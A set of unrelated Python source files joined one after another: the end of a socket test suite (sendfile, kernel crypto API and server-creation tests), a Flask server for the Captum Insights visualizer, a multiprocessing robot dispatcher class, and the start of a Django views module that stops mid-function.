with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
if sys.platform == 'OpenVMS':
srv_name = '127.0.0.1'
else:
srv_name = ''
with socket.create_server((srv_name, port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
server.py
|
#!/usr/bin/env python3
import logging
import os
import socket
import threading
from time import sleep
from typing import Optional
from flask import Flask, jsonify, render_template, request
from torch import Tensor
app = Flask(
__name__, static_folder="frontend/build/static", template_folder="frontend/build"
)
visualizer = None
port = None
def namedtuple_to_dict(obj):
if isinstance(obj, Tensor):
return obj.item()
if hasattr(obj, "_asdict"): # detect namedtuple
return dict(zip(obj._fields, (namedtuple_to_dict(item) for item in obj)))
elif isinstance(obj, str): # iterables - strings
return obj
elif hasattr(obj, "keys"): # iterables - mapping
return dict(
zip(obj.keys(), (namedtuple_to_dict(item) for item in obj.values()))
)
elif hasattr(obj, "__iter__"): # iterables - sequence
return type(obj)((namedtuple_to_dict(item) for item in obj))
else: # non-iterable cannot contain namedtuples
return obj
@app.route("/attribute", methods=["POST"])
def attribute():
# force=True needed for Colab notebooks, which doesn't use the correct
# Content-Type header when forwarding requests through the Colab proxy
r = request.get_json(force=True)
return jsonify(
namedtuple_to_dict(
visualizer._calculate_attribution_from_cache(r["instance"], r["labelIndex"])
)
)
@app.route("/fetch", methods=["POST"])
def fetch():
# force=True needed, see comment for "/attribute" route above
visualizer._update_config(request.get_json(force=True))
visualizer_output = visualizer.visualize()
clean_output = namedtuple_to_dict(visualizer_output)
return jsonify(clean_output)
@app.route("/init")
def init():
return jsonify(visualizer.get_insights_config())
@app.route("/")
def index(id=0):
return render_template("index.html")
def get_free_tcp_port():
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind(("", 0))
addr, port = tcp.getsockname()
tcp.close()
return port
def run_app(debug: bool = True):
app.run(port=port, use_reloader=False, debug=debug)
def start_server(
_viz, blocking: bool = False, debug: bool = False, _port: Optional[int] = None
):
global visualizer
visualizer = _viz
global port
if port is None:
os.environ["WERKZEUG_RUN_MAIN"] = "true" # hides starting message
if not debug:
log = logging.getLogger("werkzeug")
log.disabled = True
app.logger.disabled = True
port = _port or get_free_tcp_port()
print(f"\nFetch data and view Captum Insights at http://localhost:{port}/\n")
# Start in a new thread to not block notebook execution
t = threading.Thread(target=run_app, kwargs={"debug": debug}).start()
sleep(0.01) # add a short delay to allow server to start up
if blocking:
t.join()
return port
|
dispatcher.py
|
import logging
import multiprocessing
import platform
import time
import typing as T
from logging.handlers import QueueHandler, QueueListener
from threading import Thread
from rembrain_robot_framework import utils
from rembrain_robot_framework.logger.utils import setup_logging
from rembrain_robot_framework.services.watcher import Watcher
from multiprocessing import Queue, Process
"""
WARNING FOR MAINTAINERS:
This class uses its own multiprocessing context.
Do NOT use basic multiprocessing.Queue for mp instances
Instead use either self.mp_context.Queue, or self.manager.Queue (depending on which one you need)
"""
class RobotDispatcher:
DEFAULT_QUEUE_SIZE = 50
def __init__(
self,
config: T.Any = None,
processes: T.Optional[dict] = None,
project_description: T.Optional[dict] = None,
in_cluster: bool = True,
):
self.shared_objects = {}
self.process_pool: T.Dict[str, Process] = {}
self.in_cluster: bool = in_cluster
self.project_description = {}
if project_description is not None:
self.project_description = project_description
elif config and config.get("description"):
self.project_description = config["description"]
# It is important that we create our own separate context.
# fork() can easily wreck stability,
# since we don't know whether the dispatcher will be created after some threads already started.
# So to protect the user from deadlocking their processes, all processes are spawned in a separate context
self.mp_context = multiprocessing.get_context("spawn")
self.manager = self.mp_context.Manager()
self.processes = {} if processes is None else processes
for name, p in self.processes.items():
if "consume_queues" not in p:
p["consume_queues"] = {}
if "publish_queues" not in p:
p["publish_queues"] = {}
# todo think about hard typing for field in "config"
# todo remove it param from 'self' - it does not use in other methods
self.config = config
if self.config is None:
self.config = {
"processes": {},
"queues_sizes": {},
"shared_objects": {},
}
self.log_queue: T.Optional[Queue] = None
self._log_listener: T.Optional[QueueListener] = None
self.log: T.Optional[logging.Logger] = None
self.run_logging(project_description, in_cluster)
self.log.info("RobotHost is configuring processes.")
if "processes" not in self.config or not isinstance(
self.config["processes"], dict
):
raise Exception("'Config' params are incorrect. Please, check config file.")
# compare processes and config
if len(self.processes) != len(self.config["processes"]):
raise Exception(
"Number of processes in config is not the same as passed in __init__."
)
# p[0] is process class, p[1] is the process name
if any([p not in self.config["processes"] for p in self.processes]):
raise Exception("Process was not found in config.")
# create queues
consume_queues = {} # consume from queues
publish_queues = {} # publish to queues
self._max_queue_sizes = self._collect_queue_sizes()
for process_name, process_params in self.config["processes"].items():
if not process_params:
continue
if "consume" in process_params:
if type(process_params["consume"]) is not list:
process_params["consume"] = [process_params["consume"]]
for queue in process_params["consume"]:
if queue in consume_queues:
consume_queues[queue].append(process_name)
else:
consume_queues[queue] = [process_name]
if "publish" in process_params:
if not isinstance(process_params["publish"], list):
process_params["publish"] = [process_params["publish"]]
for queue in process_params["publish"]:
if queue in publish_queues:
publish_queues[queue].append(process_name)
else:
publish_queues[queue] = [process_name]
# copy other arguments from yaml to a file
for key in process_params:
if key not in ("publish", "consume"):
self.processes[process_name][key] = process_params[key]
for queue_name, bind_processes in consume_queues.items():
for process in bind_processes:
queue_size = int(
self.config.get("queues_sizes", {}).get(
queue_name, self.DEFAULT_QUEUE_SIZE
)
)
queue = self.mp_context.Queue(maxsize=queue_size)
self.processes[process]["consume_queues"][queue_name] = queue
if queue_name not in publish_queues:
raise Exception(
f"A process {processes} consumes from a queue {queue_name}, but no publish to it."
)
for process_ in publish_queues[queue_name]:
if queue_name in self.processes[process_]["publish_queues"]:
self.processes[process_]["publish_queues"][queue_name].append(
queue
)
else:
self.processes[process_]["publish_queues"][queue_name] = [queue]
# shared objects
if "shared_objects" in self.config and self.config["shared_objects"]:
self.shared_objects = {
name: utils.generate(obj, self.manager, self.mp_context)
for name, obj in self.config["shared_objects"].items()
}
# system processes queues(dict): process_name (key) => personal process queue (value)
self.system_queues = {
p: self.mp_context.Queue(maxsize=self.DEFAULT_QUEUE_SIZE)
for p in self.processes
}
# for heartbeat
self.watcher_queue = None
if not self.in_cluster:
self.watcher_queue = self.mp_context.Queue(maxsize=self.DEFAULT_QUEUE_SIZE)
self.watcher = Watcher(self.watcher_queue)
Thread(target=self.watcher.notify, daemon=True).start()
def start_processes(self) -> None:
for process_name in self.processes.keys():
self._run_process(process_name)
proc = self.process_pool[process_name]
self.log.info(f"Process {process_name} on PID {proc.pid} started")
def add_process(
self,
process_name: str,
process_class: T.Any,
publish_queues: T.Optional[T.Dict[str, T.List[Queue]]] = None,
consume_queues: T.Optional[T.Dict[str, Queue]] = None,
**kwargs,
) -> None:
if process_name in self.process_pool:
self.log.error(
f"Error at creating new process, process {process_name} is already running."
)
raise Exception("Process already exists in pool.")
if process_name in self.processes:
self.log.error(
f"Error at creating new process, process {process_name} already exists in processes."
)
raise Exception("Process already exists in processes.")
self.processes[process_name] = {
"process_class": process_class,
"consume_queues": consume_queues if consume_queues else {},
"publish_queues": publish_queues if publish_queues else {},
}
self._run_process(process_name, **kwargs)
self.log.info(f"New process {process_name} was created successfully.")
def add_shared_object(self, object_name: str, object_type: str) -> None:
if object_name in self.shared_objects.keys():
raise Exception(f"Shared object {object_name} already exists.")
self.shared_objects[object_name] = utils.generate(
object_type, self.manager, self.mp_context
)
def del_shared_object(self, object_name: str) -> None:
if object_name not in self.shared_objects.keys():
self.log.warning(f"Shared object {object_name} does not exist.")
return
del self.shared_objects[object_name]
def stop_process(self, process_name: str) -> None:
if process_name not in self.process_pool.keys():
self.log.error(f"Process {process_name} is not running.")
return
process: Process = self.process_pool[process_name]
if process.is_alive():
process.terminate()
process.join()
del self.process_pool[process_name]
del self.processes[process_name]
def check_queues_overflow(self) -> bool:
is_overflow = False
if platform.system() == "Darwin":
return is_overflow
for p_name, process in self.processes.items():
for q_name, queue in process["consume_queues"].items():
q_size: int = queue.qsize()
if hasattr(queue, "_maxsize"):
q_maxsize = queue._maxsize
else:
q_maxsize = self.get_queue_max_size(q_name)
if q_maxsize - q_size <= int(q_maxsize * 0.1):
self.log.warning(
f"Consume queue {q_name} of process {p_name} has reached {q_size} messages."
)
is_overflow = True
for q_name, queues in process["publish_queues"].items():
for q in queues:
q_size: int = q.qsize()
if hasattr(q, "_maxsize"):
q_maxsize = q._maxsize
else:
q_maxsize = self.get_queue_max_size(q_name)
if q_maxsize - q_size <= int(q_maxsize * 0.1):
self.log.warning(
f"Publish queue {q_name} of process {p_name} has reached {q_size} messages."
)
is_overflow = True
if is_overflow:
time.sleep(5)
return is_overflow
def _collect_queue_sizes(self) -> T.Dict[str, int]:
"""
Generates a dictionary of {queue_name: max_size}
We have to do it because some queue types (especially Manager.Queue()) hide the maxsize property
"""
result = {}
queue_names = set()
for params in self.config["processes"].values():
if not params:
continue
# Getting consume queues is enough since we always check that all publish queues are consumed
queues = params.get("consume", [])
if type(queues) is list:
for q in queues:
queue_names.add(q)
else:
queue_names.add(str(queues))
for queue_name in queue_names:
result[queue_name] = int(
self.config.get("queues_sizes", {}).get(
queue_name, self.DEFAULT_QUEUE_SIZE
)
)
return result
def get_queue_max_size(self, queue_name: str) -> int:
return self._max_queue_sizes.get(queue_name, self.DEFAULT_QUEUE_SIZE)
def run(self, shared_stop_run: T.Any = None) -> None:
if platform.system() == "Darwin":
self.log.warning("Checking of queue sizes on this system is not supported.")
while True:
if shared_stop_run is not None and shared_stop_run.value:
break
self.check_queues_overflow()
time.sleep(2)
def _run_process(self, proc_name: str, **kwargs) -> None:
process = self.mp_context.Process(
target=utils.start_process,
daemon=True,
kwargs={
"name": proc_name,
"in_cluster": self.in_cluster,
"shared_objects": self.shared_objects,
"project_description": self.project_description,
"logging_queue": self.log_queue,
"system_queues": self.system_queues,
"watcher_queue": self.watcher_queue,
**self.processes[proc_name],
**kwargs,
},
)
process.start()
self.process_pool[proc_name] = process
# todo replace all logging logic in partial class
def run_logging(self, project_description: dict, in_cluster: bool) -> None:
# Set up logging
self.log_queue, self._log_listener = setup_logging(
project_description, self.mp_context, in_cluster
)
self._log_listener.start()
self.log = logging.getLogger("RobotDispatcher")
# Clear any handlers that have already existed
self.log.handlers.clear()
self.log.setLevel(logging.INFO)
self.log.addHandler(QueueHandler(self.log_queue))
# Don't propagate to root logger
self.log.propagate = False
def stop_logging(self):
self._log_listener.stop()
|
views.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import collections, json
from threading import Thread, Timer
from background_task import background
from datetime import datetime, timedelta
from django.core.exceptions import PermissionDenied
from django.db.models import Q
from django.conf import settings
from django.contrib.auth.models import User
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render
from django.views.decorators.cache import never_cache
import requests
from aggregator.models import Variable, Dataset
from lists import *
from datasets import *
from energy_converters import *
from access_controller.policy_enforcement_point import PEP
from query_designer.models import Query, TempQuery, AbstractQuery
from service_builder.models import Service, ServiceInstance
from visualizer.utils import delete_zep_notebook, clone_zep_note, create_zep_arguments_paragraph, delete_zep_paragraph, run_zep_note, \
get_result_dict_from_livy, create_zep_getDict_paragraph, run_zep_paragraph, get_zep_getDict_paragraph_response, close_livy_session, \
create_livy_session
from time import sleep
from wave_energy_pilot.models import Wave_Energy_Converters
from website_analytics.views import *
from website_analytics.models import UserPlans
def check_access(request, service):
access_decision = PEP.access_to_service(request, service.id)
if access_decision is False:
raise PermissionDenied
def configure_spatial_filter(filters, lat_from, lat_to, lon_from, lon_to):
if type(filters) == dict:
if 'op' in filters.keys() and filters['op'] == 'inside_rect':
filters['b'] = '<<{0},{1}>,<{2},{3}>>'.format(lat_from, lon_from, lat_to, lon_to)
else:
filters['a'] = configure_spatial_filter(filters['a'], lat_from, lat_to, lon_from, lon_to)
filters['b'] = configure_spatial_filter(filters['b'], lat_from, lat_to, lon_from, lon_to)
return filters
def configure_temporal_filter(filters, start_date, end_date):
if type(filters) == dict:
if 'op' in filters.keys() and filters['op'] == 'lte_time':
filters['b'] = "'{0}'".format(end_date)
elif 'op' in filters.keys() and filters['op'] == 'gte_time':
filters['b'] = "'{0}'".format(start_date)
else:
filters['a'] = configure_temporal_filter(filters['a'], start_date, end_date)
filters['b'] = configure_temporal_filter(filters['b'], start_date, end_date)
return filters
def find_visualization_variables(variables, query_id):
return_variables = list()
doc = AbstractQuery.objects.get(pk=query_id).document
for var in variables:
variable_dict = dict({'variable': var, 'query_variable': None, 'title': None, 'unit': None, 'variable_id': None})
for _f in doc['from']:
if str(_f['select'][0]['name'])[int(str(_f['select'][0]['name']).find('_'))+1:] == var:
